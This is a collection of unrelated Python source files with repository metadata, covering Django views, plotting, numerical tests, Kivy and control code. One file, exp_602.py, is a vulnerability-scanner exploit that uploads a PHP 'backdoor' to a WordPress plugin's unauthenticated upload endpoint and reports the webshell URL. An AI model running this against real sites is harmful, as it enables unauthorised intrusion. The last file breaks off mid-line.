067e6d4e56f68e483302e5793560ba8a17439f18
|
[] |
no_license
|
crowdbotics-apps/usa-2-go-27981
|
766add8314ebdeddfcc90ba2fe0185f66f247493
|
18ba1fa997814462fc7810b01c413cd7655c758b
|
refs/heads/master
| 2023-05-27T10:25:39.406088
| 2021-06-15T01:03:53
| 2021-06-15T01:03:53
| 376,992,929
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
"""
WSGI config for usa_2_go_27981 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "usa_2_go_27981.settings")
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
fa02064419c1a25d7bb488b52884e661e606158d
|
24e390b6b3ac60baa5ee784cc017848e7e6e8426
|
/old_exercises/backup/plotlable.py
|
78c3ebcb682d03d9a38f071e66fad895ae411985
|
[] |
no_license
|
tertiarycourses/NumpySciPyTraining
|
6c83d91f7164e9cd3020fd987c55d15d93f2fcf3
|
0b45296cf07751938594973dd7fdc39d0daa04a1
|
refs/heads/master
| 2021-01-23T00:40:12.393829
| 2018-05-17T09:10:51
| 2018-05-17T09:10:51
| 92,831,280
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
import numpy
import matplotlib.pyplot as plt
x=numpy.linspace(0,2*numpy.pi,32)
plt.plot(x, numpy.sin(x))
plt.xlabel('x')
plt.ylabel('y')
plt.title('Sine Curve')
plt.show()
|
[
"angch@tertiaryinfotech.com"
] |
angch@tertiaryinfotech.com
|
9b0c90269a0a5ff5f89369b8ca2e2d59d97665fe
|
7c0acdc46cfce5dc116d394f6990ee5ab1c0fa0c
|
/venv/lib/python3.7/site-packages/buildsystem/setup.py
|
3e4ac13dece62dd1ea8f1f0ac6fe7d644541d600
|
[
"MIT"
] |
permissive
|
Vatansever27/ExchangeCode
|
84fb4a02371fdda7cd94d00971be76bcd1068be0
|
ab284653a337937139a9a28c036efe701fb376c7
|
refs/heads/master
| 2020-04-07T16:38:59.819929
| 2018-11-21T12:18:30
| 2018-11-21T12:18:30
| 158,537,067
| 0
| 0
| null | 2018-11-21T12:18:31
| 2018-11-21T11:22:14
| null |
UTF-8
|
Python
| false
| false
| 1,093
|
py
|
from .base import BaseBuilder, task
import os
class SetupBuilder(BaseBuilder):
setupdir = '.'
setupscript = None
product_title = 'Setup'
@task('compile_setup')
def do_compile_setup(self):
'''Compiles the Inno Setup Script `setupscript` into directory `setupdir` if `setupscript` is specified and exists.
`setupscript` has to be defined based on the directory `setupdir`.'''
if self.setupscript and os.path.exists(os.path.join(self.setupdir, self.setupscript)):
d = os.getcwd()
os.chdir(self.setupdir)
# write version information into git.txt
with open('git.txt', 'w') as f:
f.write(self.version)
# run setup
self.run([r'C:\Program Files (x86)\Inno Setup 5\ISCC.exe', self.setupscript])
# remove git.txt
os.remove('git.txt')
os.chdir(d)
else:
raise Exception('Setup script does not exist: %s' % os.path.join(self.setupdir, self.setupscript))
|
[
"doguhan@puentedev.io"
] |
doguhan@puentedev.io
|
c88e91b305ed920b0d4f97c56d7ec0ebf48c216c
|
20c67cd43a484819b13cb120f145def9bc1317d8
|
/usermage/views.py
|
d3063cfebd5ca6ec7725f323504b5493b4885c36
|
[] |
no_license
|
totota/trade
|
03c019f92df8846f47a1cee2a1c2b16fbcb5a50c
|
b690d51f05316d0b6f4cdcb01806ad79d3c1f4be
|
refs/heads/master
| 2021-09-02T06:43:49.175307
| 2017-10-16T11:04:01
| 2017-10-16T11:04:01
| 108,209,337
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,379
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponseRedirect,HttpResponse
from django.shortcuts import render
from .forms import registeruser,loginform
from dms.models import city,location,security,campus,user,commodity,collection,indent,delegation,delegation_order
def adduser(request):
if request.method=='POST':
form=registeruser(request.POST)
print form
print 'post'
if form.is_valid():
print type(user.objects.filter(username=form.cleaned_data['username']))
if form.cleaned_data['password'] ==form.cleaned_data['ageinpassword']:
print 'password is right'
else:
#print "password error"
information='ok'
return HttpResponse(information)
if user.objects.filter(username=form.cleaned_data['username']):
#print "yonghuchongfu"
information='用户名已经存在'
return render(request,'usermas/regins.html',{'information':information})
if campus.objects.filter(name='default'):
default=campus.objects.get(name='default')
#print 'have default'
else:
default=campus(name='default')
default.save()
#print 'no default'
if location.objects.filter(extra='default'):
defaultlocation=location.objects.get(extra='default')
#print 'have default'
else:
defaultcity=city(province='default',country='default',cityname='default')
defaultcity.save()
defaultlocation=location(extra='default',cityid=defaultcity)
defaultlocation.save()
#print 'no default'
uniquequery=request.POST.get('unique','null')
mysecurity=security(password=form.cleaned_data['password'],tel=form.cleaned_data['phone'],email=form.cleaned_data['email'])
mysecurity.save()
myuser=user(username=form.cleaned_data['username'],age=0,unique=uniquequery,security_id=mysecurity,campus_id=default,addressid=defaultlocation,locationid=defaultlocation)
myuser.save()
information='save ok'
return HttpResponse(information)
else:
return HttpResponse('errot')
else:
return render(request,'usermas/regins.html')
#return HttpResponse('error')
def login(request):
if request.method=='POST':
form=loginform(request.POST)
if form.is_valid():
print 'rrr'
myuser=user.objects.filter(username__exact=form.cleaned_data['username'],security_id__password__exact=form.cleaned_data['password'])
if myuser:
information='wellcome '+form.cleaned_data['username']
return HttpResponse(information)
else:
information='password or username error'
return render(request,'usermas/login.html',{'information':information})
else:
print'ssss'
information='fei fa'
return render(request,'usermas/login.html',{'information':information})
else:
return render(request,'usermas/login.html')
# Create your views here.
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
12ffc04da6d5d1f0f1212995f33e58915d501bc0
|
a964f0f3f93a84d5195042d3c1bb2288e8b62161
|
/muddery/server/typeclasses/locked_exit.py
|
0451335dae27a4647d7d453f79f9d35569d9f04e
|
[
"BSD-3-Clause"
] |
permissive
|
nobodxbodon/muddery
|
474433791b75d2f2130e6b758fb3126e2d56230b
|
4b4c6c0dc5cc237a5df012a05ed260fad1a793a7
|
refs/heads/master
| 2023-06-19T19:28:39.252340
| 2021-07-14T15:07:47
| 2021-07-14T15:07:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,770
|
py
|
"""
Exits
Exits are connectors between Rooms. An exit always has a destination property
set and has a single command defined on itself with the same name as its key,
for allowing Characters to traverse the exit to its destination.
"""
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
from muddery.server.mappings.typeclass_set import TYPECLASS
class MudderyLockedExit(TYPECLASS("EXIT")):
"""
Characters must unlock these exits to pass it.
The view and commands of locked exits are different from unlocked exits.
"""
typeclass_key = "LOCKED_EXIT"
typeclass_name = _("Locked Exit", "typeclasses")
model_name = "exit_locks"
def after_data_loaded(self):
"""
Set data_info to the object."
"""
super(MudderyLockedExit, self).after_data_loaded()
self.unlock_condition = getattr(self.system, "unlock_condition", "")
self.unlock_verb = getattr(self.system, "unlock_verb", "")
self.locked_desc = getattr(self.system, "locked_desc", "")
self.auto_unlock = getattr(self.system, "auto_unlock", False)
self.unlock_forever = getattr(self.system, "unlock_forever", True)
def at_before_traverse(self, traversing_object):
"""
Called just before an object uses this object to traverse to
another object (i.e. this object is a type of Exit)
Args:
traversing_object (Object): The object traversing us.
Notes:
The target destination should normally be available as
`self.destination`.
If this method returns False/None, the traverse is cancelled
before it is even started.
"""
if not super(MudderyLockedExit, self).at_before_traverse(traversing_object):
return False
# Only can pass exits which have already been unlocked.
if traversing_object.is_exit_unlocked(self.get_data_key()):
if not self.unlock_forever:
# lock the exit again
traversing_object.lock_exit(self)
return True
if self.auto_unlock and self.can_unlock(traversing_object):
# Can unlock the exit automatically.
if self.unlock_forever:
# Unlock it.
traversing_object.unlock_exit(self)
return True
# Show the object's appearance.
appearance = self.get_appearance(traversing_object)
traversing_object.msg({"look_obj": appearance})
return False
def can_unlock(self, caller):
"""
Unlock an exit.
"""
# Only can unlock exits which match there conditions.
return STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
def get_appearance(self, caller):
"""
This is a convenient hook for a 'look'
command to call.
"""
# Get name and description.
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
can_unlock = self.can_unlock(caller)
if self.auto_unlock and can_unlock:
if self.unlock_forever:
# Automatically unlock the exit when a character looking at it.
caller.unlock_exit(self)
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
cmds = []
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock_exit", "args": self.dbref}]
info = {"dbref": self.dbref,
"name": self.name,
"desc": self.locked_desc,
"cmds": cmds}
return info
def get_available_commands(self, caller):
"""
This returns a list of available commands.
"args" must be a string without ' and ", usually it is self.dbref.
"""
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common commands.
return super(MudderyLockedExit, self).get_available_commands(caller)
cmds = []
can_unlock = STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock", "args": self.dbref}]
return cmds
|
[
"luyijun999@gmail.com"
] |
luyijun999@gmail.com
|
bffdd5605e70c0218027950b2a97ca075262aee1
|
66dead2e38d06f5ca06463d669515876f7eb1771
|
/{{cookiecutter.project_name}}/tests/test_server/test_urls.py
|
abb5b5626aa423ead2e752d00c266d5a31417071
|
[
"MIT"
] |
permissive
|
viktortat/wemake-django-template
|
349920117d008e545db162ea11c4235fdf4bf0df
|
991bbb8b34ed4b705d38080caa1ffa3893362520
|
refs/heads/master
| 2020-03-21T10:32:01.894036
| 2018-06-22T09:41:22
| 2018-06-22T09:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
# -*- coding: utf-8 -*-
def test_admin_unauthorized(client):
"""This test ensures that admin panel requires auth."""
response = client.get('/admin/')
assert response.status_code == 302
def test_admin_authorized(admin_client):
"""This test ensures that admin panel is accessible."""
response = admin_client.get('/admin/')
assert response.status_code == 200
def test_robots_txt(client):
"""This test ensures that `robots.txt` is accessible."""
response = client.get('/robots.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
def test_humans_txt(client):
"""This test ensures that `humans.txt` is accessible."""
response = client.get('/humans.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
|
[
"mail@sobolevn.me"
] |
mail@sobolevn.me
|
d2f8a19b3de851ef689fddf518cebea8c37b91ec
|
17fe32a70be82d9fd6c3268b840226b5567c8b29
|
/torchtuples/utils.py
|
bb86e8e2b7557ada3baedd86a27b975d4f3b2644
|
[
"MIT",
"BSD-2-Clause"
] |
permissive
|
georgehc/dksa
|
dbb7161a75b8206d3d469bb5b966ed7a0f84d86c
|
bcd9eab6c9ded47f5b166cf1351b06e26e0c8f90
|
refs/heads/master
| 2023-08-02T06:15:12.472386
| 2021-10-01T17:47:25
| 2021-10-01T17:47:25
| 282,355,975
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,855
|
py
|
import time
import random
import numpy as np
import torch
from torchtuples import tuplefy, TupleTree
def make_name_hash(name='', file_ending='.pt'):
year, month, day, hour, minute, second = time.localtime()[:6]
ascii_letters_digits = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
random_hash = ''.join(random.choices(ascii_letters_digits, k=20))
path = f"{name}_{year}-{month}-{day}_{hour}-{minute}-{second}_{random_hash}{file_ending}"
return path
class TimeLogger:
def __init__(self, start=None):
self.start = self.time() if start is None else start
self.prev = self.start
@staticmethod
def time():
return time.time()
def diff(self):
prev, self.prev = (self.prev, self.time())
return self.prev - self.start, self.prev - prev
@staticmethod
def _hms_from_sec(sec):
"""Hours, minutes, seconds."""
m, s = divmod(sec, 60)
h, m = divmod(m, 60)
return h, m, s
@staticmethod
def _hms_str(h, m, s, shorten=True):
"""Hours, minutes, seconds."""
hs = f"{int(h)}h:"
ms = f"{int(m)}m:"
ss = f"{int(s)}s"
if shorten:
if h == 0:
hs = ''
if m == 0:
ms = ''
return f"{hs}{ms}{ss}"
# return f"{int(h)}h:{int(m)}m:{int(s)}s"
def hms_diff(self, shorten=True):
diff_start, diff_prev = self.diff()
hms_start = self._hms_from_sec(diff_start)
hms_prev = self._hms_from_sec(diff_prev)
return self._hms_str(*hms_start, shorten), self._hms_str(*hms_prev, shorten)
def array_or_tensor(tensor, numpy, input):
"""Returs a tensor if numpy is False or input is tensor.
Else it returns numpy array, even if input is a DataLoader.
"""
is_tensor = None
if numpy is False:
is_tensor = True
elif (numpy is True) or is_dl(input):
is_tensor = False
elif not (is_data(input) or is_dl(input)):
raise ValueError(f"Do not understand type of `input`: {type(input)}")
elif tuplefy(input).type() is torch.Tensor:
is_tensor = True
elif tuplefy(input).type() is np.ndarray:
is_tensor = False
else:
raise ValueError("Something wrong")
if is_tensor:
tensor = tuplefy(tensor).to_tensor().val_if_single()
else:
tensor = tuplefy(tensor).to_numpy().val_if_single()
return tensor
def is_data(input):
"""Returns True if `input` is data of type tuple, list, TupleTree, np.array, torch.Tensor."""
datatypes = [np.ndarray, torch.Tensor, tuple, list, TupleTree]
return any([isinstance(input, ct) for ct in datatypes])
def is_dl(input):
"""Returns True if `input` is a DataLoader (inherit from DataLoader)."""
return isinstance(input, torch.utils.data.DataLoader)
|
[
"georgechen@cmu.edu"
] |
georgechen@cmu.edu
|
8da334eb44c9ea9052929ef18f09fca3bede6dbe
|
65348a4305d10b88c3b4e34eb00d66cf5db6aba7
|
/main.py
|
225446846dea7cdde0668e429d65088b5214d266
|
[] |
no_license
|
lailacampos/Simple-GUI-Kivy
|
a3671b9dd7f39c6b1efb3c0521753a8a99f32fa8
|
19b0ed9ff7ad4039d842b2d4223a7d79ffb56dc2
|
refs/heads/main
| 2023-08-22T03:08:48.696503
| 2021-09-22T02:19:27
| 2021-09-22T02:19:27
| 407,191,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
# Useful links:
# https://kivy.org/doc/stable/guide/basic.html#quickstart
# https://kivy.org/doc/stable/api-kivy.app.html
# https://youtu.be/YDp73WjNISc
from kivy.app import App
from kivy.uix.label import Label
# The MyMainApp() class is derived from the App() class of the kivy.app repository.
# The App() class is the base for creating Kivy applications.
# Kivy requires that the class inherits from the App class
class MyApp(App):
# The build() method initializes the application and returns a widget that will be used as [root] and added to the window.
# This method doesn't need to be called,: the App().run() will do that.
def build(self):
label = Label(text="Hello World")
return label
if __name__ == "__main__":
MyApp().run()
|
[
"enders.game1990@gmail.com"
] |
enders.game1990@gmail.com
|
4d3122b6a5a76c30a85ea82eef87b31bb9ff3d7f
|
9bcb5032d27ca321f489c035f7d46019ffdf4b85
|
/numericalFunctions/ptwXY/Python/Test/Flat/binaryMath/flatMath.py
|
46871d9e915089e2d32588a84b4438372de42ec5
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
LLNL/gidiplus
|
128ef4d4acbcb264e31794a535cd95e8c77d8a96
|
e1c6f0e4de51bc4d7616c5c4676b9818c4b9817c
|
refs/heads/master
| 2023-08-31T06:21:14.519577
| 2023-02-13T18:35:20
| 2023-02-13T18:35:20
| 187,251,526
| 10
| 3
|
NOASSERTION
| 2021-12-23T00:28:07
| 2019-05-17T16:48:24
|
C++
|
UTF-8
|
Python
| false
| false
| 5,300
|
py
|
# <<BEGIN-copyright>>
# Copyright 2019, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: MIT
# <<END-copyright>>
import os
from numericalFunctions import pointwiseXY_C
accuracy = 1e-2
biSectionMax = 0.
if( 'CHECKOPTIONS' in os.environ ) :
options = os.environ['CHECKOPTIONS'].split( )
if( '-e' in options ) : print( __file__ )
CPATH = '../../../../Test/Flat/binaryMath'
os.system( 'cd %s; make -s clean; ./flatMath -v > v' % CPATH )
def skipBlankLines( ls ) :
i = 0
for i, l in enumerate( ls ) :
if( l.strip( ) != '' ) : break
ls = ls[i:]
if( ( len( ls ) == 1 ) and ( ls[0].strip( ) == '' ) ) : ls = []
return( ls )
def getIntegerValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = int( ls[0].split( '=' )[1] )
return( ls[1:], value )
def getDoubleValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = float( ls[0].split( '=' )[1] )
return( ls[1:], value )
def compareValues( label, i, v1, v2 ) :
sv1, sv2 = '%.12e' % v1, '%.12e' % v2
sv1, sv2 = '%.7e' % float( sv1 ), '%.7e' % float( sv2 )
if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) )
if( sv1 != sv2 ) : raise Exception( '%s: values %e and %e diff by %e at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )
def getXYData( ls, biSectionMax, accuracy ) :
ls, length = getIntegerValue( 'length', ls )
data = [ list( map( float, ls[i].split( ) ) ) for i in range( length ) ]
data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, biSectionMax = biSectionMax, accuracy = accuracy, safeDivide = True, interpolation = "flat" )
ls = ls[length:]
ls = skipBlankLines( ls )
return( ls, data )
def getCommand( ls ) :
s = ls[0].split( )
if( len( s ) != 2 ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
if( s[0] != "#" ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
return( ls[1:], s[1] )
def compareXYs( XYs1, XYs2, label ) :
if( len( XYs1 ) != len( XYs2 ) ) : raise Exception( 'for %s: len( XYs1 ) = %s != len( XYs2 ) = %s' % ( label, len( XYs1 ), len( XYs2 ) ) )
for i, xy in enumerate( XYs1 ) :
compareValues( "x division " + label, count, xy[0], XYs2[i][0] )
compareValues( "y division " + label, count, xy[1], XYs2[i][1] )
def mathParse( count, ls ) :
ls, command = getCommand( ls )
if( command == 'double' ) :
ls = doubleCheck( count, ls )
elif( command == 'all_double' ) :
ls = allDoubleCheck( count, ls )
elif( command == 'binary_add_sub' ) :
ls = binaryAddSubCheck( count, ls )
elif( command == 'binary_mul_div' ) :
ls = binaryMulDivCheck( count, ls )
else :
raise Exception( 'Invalid command = "%s"' % command )
return( ls )
def doubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, o = getCommand( ls )
if( o not in '+-=*/\\' ) : raise Exception( 'Unknown operator "%s"' % o )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
if( o == '+' ) : results = XYs + d
elif( o == '-' ) : results = XYs - d
elif( o == '=' ) : results = d - XYs
elif( o == '*' ) : results = XYs * d
elif( o == '/' ) : results = XYs / d
elif( o == '\\' ) : results = d / XYs
compareXYs( resultsC, results, "doubleCheck %s" % o )
return( ls )
def allDoubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = ( ( d * ( XYs + d ) ) - d ) / d
results = ( ( ( d * results ) + d ) / d ) - d
compareXYs( resultsC, results, "allDoubleCheck" )
return( ls )
def binaryAddSubCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 + XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results - XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
return( ls )
def binaryMulDivCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 * XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results / XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
return( ls )
f = open( os.path.join( CPATH, 'v' ) )
ls = f.readlines( )
f.close( )
ls, accuracy = getDoubleValue( 'accuracy', ls )
count = 0
while( len( ls ) ) :
count += 1
ls = mathParse( count, ls )
|
[
"mattoon1@llnl.gov"
] |
mattoon1@llnl.gov
|
718209cd4e9b8129270bfd7cfce002ecbefdd48f
|
e49b654d3db99773390c5b9686df9c99fbf92b2a
|
/linked_lists/remove_nth_from_end.py
|
df9193a1a375cfc8ab394f07106bc5c85074e045
|
[] |
no_license
|
hao89/diary_of_programming_puzzles
|
467e8264d0ad38768ba5ac3cfb45301293d79943
|
0e05d3716f28075f99bbd7b433d16a383209e57c
|
refs/heads/master
| 2021-01-16T00:49:38.956102
| 2015-08-25T13:44:53
| 2015-08-25T13:44:53
| 41,692,587
| 1
| 0
| null | 2015-08-31T18:20:38
| 2015-08-31T18:20:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
"""
Given a linked list, remove the nth node from the end of the list and return
its head.
For example,
Given the linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes
1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass
"""
# @param head a reference to the head of the list
# @param n the position (from the tail) of the node that should be deleted
# @return a new linked list with the required node deleted
def remove_nth_from_end(head, n):
n_behind_node = head
faster_node = head
before_behind_node = head
for i in xrange(0, n):
faster_node = faster_node.next
while faster_node:
faster_node = faster_node.next
before_behind_node = n_behind_node
n_behind_node = n_behind_node.next
# handle situation where there is only one node in the linked list or the
# head is the one being removed
if before_behind_node == n_behind_node:
if not n_behind_node.next:
head = None
else:
head = n_behind_node.next
else:
before_behind_node.next = before_behind_node.next.next
return head
|
[
"me@davidadamojr.com"
] |
me@davidadamojr.com
|
ae5fa2cf162831595429963b02bdc5cfc7fb8baf
|
7e9daf6a2a3ebfb969e793f92afc0dc5f1c2fc35
|
/venv/bin/pip
|
f925d1739221b77a3093bdff330b2aded4106b0b
|
[] |
no_license
|
NARESHSWAMI199/5-Star-On-Hacker-Rank-Python
|
e43ce5cb3429d2a683c37e6f4ba6440d073d47c2
|
51f245d1d0966de21ddf861b22fe3379e7c8a0a7
|
refs/heads/main
| 2023-02-25T03:05:25.330205
| 2021-01-19T13:49:27
| 2021-01-19T13:49:27
| 325,296,957
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 256
|
#!/home/naresh/Documents/django/hrank/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"swaminaresh993@gmail.com"
] |
swaminaresh993@gmail.com
|
|
105ea887fde8976e0371b1515151cd874df939cd
|
39dc5f1ffa71ad5e7aab5e92bb118bddf3ddae44
|
/ats/users/urls.py
|
63a22a7046e3bb8a9decd34439b0530732abd1fc
|
[
"MIT"
] |
permissive
|
MahmoudFarid/ats
|
14422a136c574d33745ac874e02e2211cce8bf14
|
1f882168cba2f34451cbb9bba1e37ce93ef0c465
|
refs/heads/master
| 2023-08-28T09:08:49.860168
| 2020-07-28T20:35:00
| 2020-07-28T20:35:00
| 278,744,279
| 0
| 0
|
MIT
| 2021-11-12T15:22:34
| 2020-07-10T22:23:07
|
Python
|
UTF-8
|
Python
| false
| false
| 358
|
py
|
from django.urls import path
from ats.users.views import (
user_detail_view,
user_redirect_view,
user_update_view,
)
app_name = "users"
urlpatterns = [
path("~redirect/", view=user_redirect_view, name="redirect"),
path("~update/", view=user_update_view, name="update"),
path("<str:email>/", view=user_detail_view, name="detail"),
]
|
[
"mahmoud.farid.94@gmail.com"
] |
mahmoud.farid.94@gmail.com
|
21c2ff1c781282e130ce340af0483a9cecda2ee7
|
ced2fe3abf39bf14519feb809f5cd4e56c828b46
|
/notebooks/solution/control.py
|
1225ebf7d93259de25bc077dcf008f6d1f42287a
|
[
"CC-BY-4.0"
] |
permissive
|
nanounanue/pydy-tutorial-pycon-2014
|
f68fb8bb967f6229743151c023b0b6da50d46f24
|
9a111ada7478a16c41ab75253e631a400febb083
|
refs/heads/master
| 2020-12-25T16:25:38.826055
| 2014-06-20T14:54:37
| 2014-06-20T14:54:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,454
|
py
|
#!/usr/bin/env python
# Controller Design
from numpy import zeros, matrix, eye, dot, asarray
from numpy.linalg import inv
from scipy.linalg import solve_continuous_are
from .utils import controllable
from .visualization import *
equilibrium_point = zeros(len(coordinates + speeds))
equilibrium_dict = dict(zip(coordinates + speeds, equilibrium_point))
parameter_dict = dict(zip(constants, numerical_constants))
linear_state_matrix, linear_input_matrix, inputs = kane.linearize()
f_A_lin = linear_state_matrix.subs(parameter_dict).subs(equilibrium_dict)
f_B_lin = linear_input_matrix.subs(parameter_dict).subs(equilibrium_dict)
m_mat = mass_matrix.subs(parameter_dict).subs(equilibrium_dict)
A = matrix(m_mat.inv() * f_A_lin).astype(float)
B = matrix(m_mat.inv() * f_B_lin).astype(float)
assert controllable(A, B)
Q = matrix(eye(6))
R = matrix(eye(3))
S = solve_continuous_are(A, B, Q, R)
K = inv(R) * B.T * S
# This is an annoying little issue. We specified the order of things when
# creating the rhs function, but the linearize function returns the F_B
# matrix in the order corresponding to whatever order it finds the joint
# torques. This would also screw things up if we specified a different
# ordering of the coordinates and speeds as the standard kana._q + kane._u
K = K[[0, 2, 1], :]
def controller(x, t):
return -asarray(dot(K, x)).flatten()
args['specified'] = controller
y = odeint(right_hand_side, x0, t, args=(args,))
|
[
"moorepants@gmail.com"
] |
moorepants@gmail.com
|
6b7b060513cf603782ed5bf499c61bedf4ab8776
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_602.py
|
9d51ac6e5eea714832eab404bedc4db5c96a7b00
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
fcbbaec32e58baf63051f622962e9ba754e5e366
|
908655251066427f654ee33ebdf804f9f302fcc3
|
/Tests/Pedestrian/Pedestrian_AS.py
|
6fca7c3c2b9f432c82c945dd4a51c48690014dc8
|
[] |
no_license
|
maxiaoba/MCTSPO
|
be567f80f1dcf5c35ac857a1e6690e1ac599a59d
|
eedfccb5a94e089bd925b58f3d65eef505378bbc
|
refs/heads/main
| 2023-07-05T02:20:16.752650
| 2021-07-06T06:04:40
| 2021-07-06T06:04:40
| 381,811,407
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,548
|
py
|
import mcts.AdaptiveStressTestingActionSpace as AST_AS
import mcts.ASTSim as ASTSim
import mcts.MCTSdpw as MCTSdpw
import mcts.AST_MCTS as AST_MCTS
import numpy as np
from Pedestrian.av_simulator import AVSimulator
from Pedestrian.av_reward import AVReward
from Pedestrian.av_spaces import AVSpaces
from mylab.envs.ast_env import ASTEnv
import math
np.random.seed(0)
max_path_length = 50
ec = 100.0
n = 160
top_k = 10
RNG_LENGTH = 2
SEED = 0
reward_function = AVReward()
spaces = AVSpaces(interactive=True)
sim = AVSimulator(use_seed=False,spaces=spaces,max_path_length=max_path_length)
env = ASTEnv(interactive=True,
sample_init_state=False,
s_0=[-0.5, -4.0, 1.0, 11.17, -35.0],
simulator=sim,
reward_function=reward_function,
)
ast_params = AST_AS.ASTParams(max_path_length)
ast = AST_AS.AdaptiveStressTestAS(ast_params, env)
macts_params = MCTSdpw.DPWParams(max_path_length,ec,n,0.5,0.85,1.0,0.0,True,1.0e308,np.uint64(0),top_k)
stress_test_num = 2
if stress_test_num == 2:
